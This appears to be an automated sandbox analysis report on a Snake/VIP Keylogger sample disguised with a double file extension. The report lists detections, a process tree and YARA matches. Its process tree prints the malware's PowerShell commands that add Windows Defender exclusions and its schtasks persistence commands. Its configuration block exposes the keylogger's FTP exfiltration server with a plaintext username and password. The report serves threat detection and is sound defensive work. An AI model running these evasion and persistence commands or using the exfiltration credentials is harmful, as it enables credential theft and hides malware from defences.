Edit tour

Windows Analysis Report
GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Overview

General Information

Sample name:	GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Analysis ID:	1524790
MD5:	be92b638000820878c7be0e70e257c95
SHA1:	af9706bed063d07c65eac06773c8e6a1ed2e447a
SHA256:	407df9654a54792ee72730f5dae8bd303d7d92a24a5fe0a5bc83f634bab7a235
Tags:	exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Sigma detected: Suspicious Double Extension File Execution

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to many ports of the same IP (likely port scanning)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

GeriOdemeBildirimi942.rar.xlxs.pdf.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" MD5: BE92B638000820878C7BE0E70E257C95)

powershell.exe (PID: 4048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7360 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6912 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

GeriOdemeBildirimi942.rar.xlxs.pdf.exe (PID: 7220 cmdline: "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe" MD5: BE92B638000820878C7BE0E70E257C95)

SOFcFE.exe (PID: 7376 cmdline: C:\Users\user\AppData\Roaming\SOFcFE.exe MD5: BE92B638000820878C7BE0E70E257C95)

schtasks.exe (PID: 7620 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SOFcFE.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Roaming\SOFcFE.exe" MD5: BE92B638000820878C7BE0E70E257C95)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "FTP", "Username": "awaratre_log@awaratrendz.com", "Password": "mxH!EyDs(.jx", "FTP Server": "ftp://awaratrendz.com/", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe40:$a1: get_encryptedPassword 0x115d:$a2: get_encryptedUsername 0xc50:$a3: get_timePasswordChanged 0xd59:$a4: get_passwordField 0xe56:$a5: set_encryptedPassword 0x2502:$a7: get_logins 0x2465:$a10: KeyLoggerEventArgs 0x20ca:$a11: KeyLoggerEventArgsEventHandler
0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2eba0:$a1: get_encryptedPassword 0x727c0:$a1: get_encryptedPassword 0xb61e0:$a1: get_encryptedPassword 0x2eebd:$a2: get_encryptedUsername 0x72add:$a2: get_encryptedUsername 0xb64fd:$a2: get_encryptedUsername 0x2e9b0:$a3: get_timePasswordChanged 0x725d0:$a3: get_timePasswordChanged 0xb5ff0:$a3: get_timePasswordChanged 0x2eab9:$a4: get_passwordField 0x726d9:$a4: get_passwordField 0xb60f9:$a4: get_passwordField 0x2ebb6:$a5: set_encryptedPassword 0x727d6:$a5: set_encryptedPassword 0xb61f6:$a5: set_encryptedPassword 0x30262:$a7: get_logins 0x73e82:$a7: get_logins 0xb78a2:$a7: get_logins 0x301c5:$a10: KeyLoggerEventArgs 0x73de5:$a10: KeyLoggerEventArgs 0xb7805:$a10: KeyLoggerEventArgs
00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbeca8:$a1: get_encryptedPassword 0x1026c8:$a1: get_encryptedPassword 0x25af60:$a1: get_encryptedPassword 0xbefc5:$a2: get_encryptedUsername 0x1029e5:$a2: get_encryptedUsername 0x25b27d:$a2: get_encryptedUsername 0xbeab8:$a3: get_timePasswordChanged 0x1024d8:$a3: get_timePasswordChanged 0x25ad70:$a3: get_timePasswordChanged 0xbebc1:$a4: get_passwordField 0x1025e1:$a4: get_passwordField 0x25ae79:$a4: get_passwordField 0xbecbe:$a5: set_encryptedPassword 0x1026de:$a5: set_encryptedPassword 0x25af76:$a5: set_encryptedPassword 0xc036a:$a7: get_logins 0x103d8a:$a7: get_logins 0x25c622:$a7: get_logins 0xc02cd:$a10: KeyLoggerEventArgs 0x103ced:$a10: KeyLoggerEventArgs 0x25c585:$a10: KeyLoggerEventArgs
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35994:$a1: get_encryptedPassword 0x35ca7:$a2: get_encryptedUsername 0x357ae:$a3: get_timePasswordChanged 0x358b7:$a4: get_passwordField 0x359aa:$a5: set_encryptedPassword 0x37e5a:$a7: get_logins 0x37dbd:$a10: KeyLoggerEventArgs 0x37a26:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SOFcFE.exe PID: 7376	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SOFcFE.exe PID: 7376	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SOFcFE.exe PID: 7376	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SOFcFE.exe PID: 7376	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SOFcFE.exe PID: 7376	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x353c6:$a1: get_encryptedPassword 0x356d9:$a2: get_encryptedUsername 0x351e0:$a3: get_timePasswordChanged 0x352e9:$a4: get_passwordField 0x353dc:$a5: set_encryptedPassword 0x3788c:$a7: get_logins 0x377ef:$a10: KeyLoggerEventArgs 0x37458:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: SOFcFE.exe PID: 7664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SOFcFE.exe PID: 7664	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: SOFcFE.exe PID: 7664	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SOFcFE.exe PID: 7664	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6ef43:$a1: get_encryptedPassword 0x6f256:$a2: get_encryptedUsername 0x6ed5d:$a3: get_timePasswordChanged 0x6ee66:$a4: get_passwordField 0x6ef59:$a5: set_encryptedPassword 0x71409:$a7: get_logins 0x7136c:$a10: KeyLoggerEventArgs 0x70fd5:$a11: KeyLoggerEventArgsEventHandler
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.SOFcFE.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.SOFcFE.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.SOFcFE.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e040:$a1: get_encryptedPassword 0x2e35d:$a2: get_encryptedUsername 0x2de50:$a3: get_timePasswordChanged 0x2df59:$a4: get_passwordField 0x2e056:$a5: set_encryptedPassword 0x2f702:$a7: get_logins 0x2f665:$a10: KeyLoggerEventArgs 0x2f2ca:$a11: KeyLoggerEventArgsEventHandler
20.2.SOFcFE.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec5a:$s1: UnHook 0x2ec61:$s2: SetHook 0x2ec69:$s3: CallNextHook 0x2ec76:$s4: _hook
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c240:$a1: get_encryptedPassword 0x2c55d:$a2: get_encryptedUsername 0x2c050:$a3: get_timePasswordChanged 0x2c159:$a4: get_passwordField 0x2c256:$a5: set_encryptedPassword 0x2d902:$a7: get_logins 0x2d865:$a10: KeyLoggerEventArgs 0x2d4ca:$a11: KeyLoggerEventArgsEventHandler
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39661:$a3: \Google\Chrome\User Data\Default\Login Data 0x398be:$a4: \Orbitum\User Data\Default\Login Data 0x3a29d:$a5: \Kometa\User Data\Default\Login Data
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce5a:$s1: UnHook 0x2ce61:$s2: SetHook 0x2ce69:$s3: CallNextHook 0x2ce76:$s4: _hook
16.2.SOFcFE.exe.4475780.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.SOFcFE.exe.4475780.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.SOFcFE.exe.4475780.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.SOFcFE.exe.4475780.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c240:$a1: get_encryptedPassword 0x2c55d:$a2: get_encryptedUsername 0x2c050:$a3: get_timePasswordChanged 0x2c159:$a4: get_passwordField 0x2c256:$a5: set_encryptedPassword 0x2d902:$a7: get_logins 0x2d865:$a10: KeyLoggerEventArgs 0x2d4ca:$a11: KeyLoggerEventArgsEventHandler
16.2.SOFcFE.exe.4475780.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39661:$a3: \Google\Chrome\User Data\Default\Login Data 0x398be:$a4: \Orbitum\User Data\Default\Login Data 0x3a29d:$a5: \Kometa\User Data\Default\Login Data
16.2.SOFcFE.exe.4475780.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce5a:$s1: UnHook 0x2ce61:$s2: SetHook 0x2ce69:$s3: CallNextHook 0x2ce76:$s4: _hook
16.2.SOFcFE.exe.4431b60.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.SOFcFE.exe.4431b60.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.SOFcFE.exe.4431b60.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.SOFcFE.exe.4431b60.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c240:$a1: get_encryptedPassword 0x2c55d:$a2: get_encryptedUsername 0x2c050:$a3: get_timePasswordChanged 0x2c159:$a4: get_passwordField 0x2c256:$a5: set_encryptedPassword 0x2d902:$a7: get_logins 0x2d865:$a10: KeyLoggerEventArgs 0x2d4ca:$a11: KeyLoggerEventArgsEventHandler
16.2.SOFcFE.exe.4431b60.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39661:$a3: \Google\Chrome\User Data\Default\Login Data 0x398be:$a4: \Orbitum\User Data\Default\Login Data 0x3a29d:$a5: \Kometa\User Data\Default\Login Data
16.2.SOFcFE.exe.4431b60.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce5a:$s1: UnHook 0x2ce61:$s2: SetHook 0x2ce69:$s3: CallNextHook 0x2ce76:$s4: _hook
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c240:$a1: get_encryptedPassword 0x2c55d:$a2: get_encryptedUsername 0x2c050:$a3: get_timePasswordChanged 0x2c159:$a4: get_passwordField 0x2c256:$a5: set_encryptedPassword 0x2d902:$a7: get_logins 0x2d865:$a10: KeyLoggerEventArgs 0x2d4ca:$a11: KeyLoggerEventArgsEventHandler
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e040:$a1: get_encryptedPassword 0x2e35d:$a2: get_encryptedUsername 0x2de50:$a3: get_timePasswordChanged 0x2df59:$a4: get_passwordField 0x2e056:$a5: set_encryptedPassword 0x2f702:$a7: get_logins 0x2f665:$a10: KeyLoggerEventArgs 0x2f2ca:$a11: KeyLoggerEventArgsEventHandler
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39fbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39661:$a3: \Google\Chrome\User Data\Default\Login Data 0x398be:$a4: \Orbitum\User Data\Default\Login Data 0x3a29d:$a5: \Kometa\User Data\Default\Login Data
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec5a:$s1: UnHook 0x2ec61:$s2: SetHook 0x2ec69:$s3: CallNextHook 0x2ec76:$s4: _hook
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ce5a:$s1: UnHook 0x2ce61:$s2: SetHook 0x2ce69:$s3: CallNextHook 0x2ce76:$s4: _hook
16.2.SOFcFE.exe.4475780.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.SOFcFE.exe.4475780.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.SOFcFE.exe.4475780.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.SOFcFE.exe.4475780.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.SOFcFE.exe.4475780.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e040:$a1: get_encryptedPassword 0x71a60:$a1: get_encryptedPassword 0x2e35d:$a2: get_encryptedUsername 0x71d7d:$a2: get_encryptedUsername 0x2de50:$a3: get_timePasswordChanged 0x71870:$a3: get_timePasswordChanged 0x2df59:$a4: get_passwordField 0x71979:$a4: get_passwordField 0x2e056:$a5: set_encryptedPassword 0x71a76:$a5: set_encryptedPassword 0x2f702:$a7: get_logins 0x73122:$a7: get_logins 0x2f665:$a10: KeyLoggerEventArgs 0x73085:$a10: KeyLoggerEventArgs 0x2f2ca:$a11: KeyLoggerEventArgsEventHandler 0x72cea:$a11: KeyLoggerEventArgsEventHandler
16.2.SOFcFE.exe.4475780.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f7de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b461:$a3: \Google\Chrome\User Data\Default\Login Data 0x7ee81:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6be:$a4: \Orbitum\User Data\Default\Login Data 0x7f0de:$a4: \Orbitum\User Data\Default\Login Data 0x3c09d:$a5: \Kometa\User Data\Default\Login Data 0x7fabd:$a5: \Kometa\User Data\Default\Login Data
16.2.SOFcFE.exe.4475780.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec5a:$s1: UnHook 0x7267a:$s1: UnHook 0x2ec61:$s2: SetHook 0x72681:$s2: SetHook 0x2ec69:$s3: CallNextHook 0x72689:$s3: CallNextHook 0x2ec76:$s4: _hook 0x72696:$s4: _hook
16.2.SOFcFE.exe.4431b60.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.SOFcFE.exe.4431b60.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.SOFcFE.exe.4431b60.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.SOFcFE.exe.4431b60.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.SOFcFE.exe.4431b60.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e040:$a1: get_encryptedPassword 0x71c60:$a1: get_encryptedPassword 0xb5680:$a1: get_encryptedPassword 0x2e35d:$a2: get_encryptedUsername 0x71f7d:$a2: get_encryptedUsername 0xb599d:$a2: get_encryptedUsername 0x2de50:$a3: get_timePasswordChanged 0x71a70:$a3: get_timePasswordChanged 0xb5490:$a3: get_timePasswordChanged 0x2df59:$a4: get_passwordField 0x71b79:$a4: get_passwordField 0xb5599:$a4: get_passwordField 0x2e056:$a5: set_encryptedPassword 0x71c76:$a5: set_encryptedPassword 0xb5696:$a5: set_encryptedPassword 0x2f702:$a7: get_logins 0x73322:$a7: get_logins 0xb6d42:$a7: get_logins 0x2f665:$a10: KeyLoggerEventArgs 0x73285:$a10: KeyLoggerEventArgs 0xb6ca5:$a10: KeyLoggerEventArgs
16.2.SOFcFE.exe.4431b60.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bdbe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7f9de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc33fe:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b461:$a3: \Google\Chrome\User Data\Default\Login Data 0x7f081:$a3: \Google\Chrome\User Data\Default\Login Data 0xc2aa1:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b6be:$a4: \Orbitum\User Data\Default\Login Data 0x7f2de:$a4: \Orbitum\User Data\Default\Login Data 0xc2cfe:$a4: \Orbitum\User Data\Default\Login Data 0x3c09d:$a5: \Kometa\User Data\Default\Login Data 0x7fcbd:$a5: \Kometa\User Data\Default\Login Data 0xc36dd:$a5: \Kometa\User Data\Default\Login Data
16.2.SOFcFE.exe.4431b60.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2ec5a:$s1: UnHook 0x7287a:$s1: UnHook 0xb629a:$s1: UnHook 0x2ec61:$s2: SetHook 0x72881:$s2: SetHook 0xb62a1:$s2: SetHook 0x2ec69:$s3: CallNextHook 0x72889:$s3: CallNextHook 0xb62a9:$s3: CallNextHook 0x2ec76:$s4: _hook 0x72896:$s4: _hook 0xb62b6:$s4: _hook
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e040:$a1: get_encryptedPassword 0x71a60:$a1: get_encryptedPassword 0x1ca2f8:$a1: get_encryptedPassword 0x2e35d:$a2: get_encryptedUsername 0x71d7d:$a2: get_encryptedUsername 0x1ca615:$a2: get_encryptedUsername 0x2de50:$a3: get_timePasswordChanged 0x71870:$a3: get_timePasswordChanged 0x1ca108:$a3: get_timePasswordChanged 0x2df59:$a4: get_passwordField 0x71979:$a4: get_passwordField 0x1ca211:$a4: get_passwordField 0x2e056:$a5: set_encryptedPassword 0x71a76:$a5: set_encryptedPassword 0x1ca30e:$a5: set_encryptedPassword 0x2f702:$a7: get_logins 0x73122:$a7: get_logins 0x1cb9ba:$a7: get_logins 0x2f665:$a10: KeyLoggerEventArgs 0x73085:$a10: KeyLoggerEventArgs 0x1cb91d:$a10: KeyLoggerEventArgs
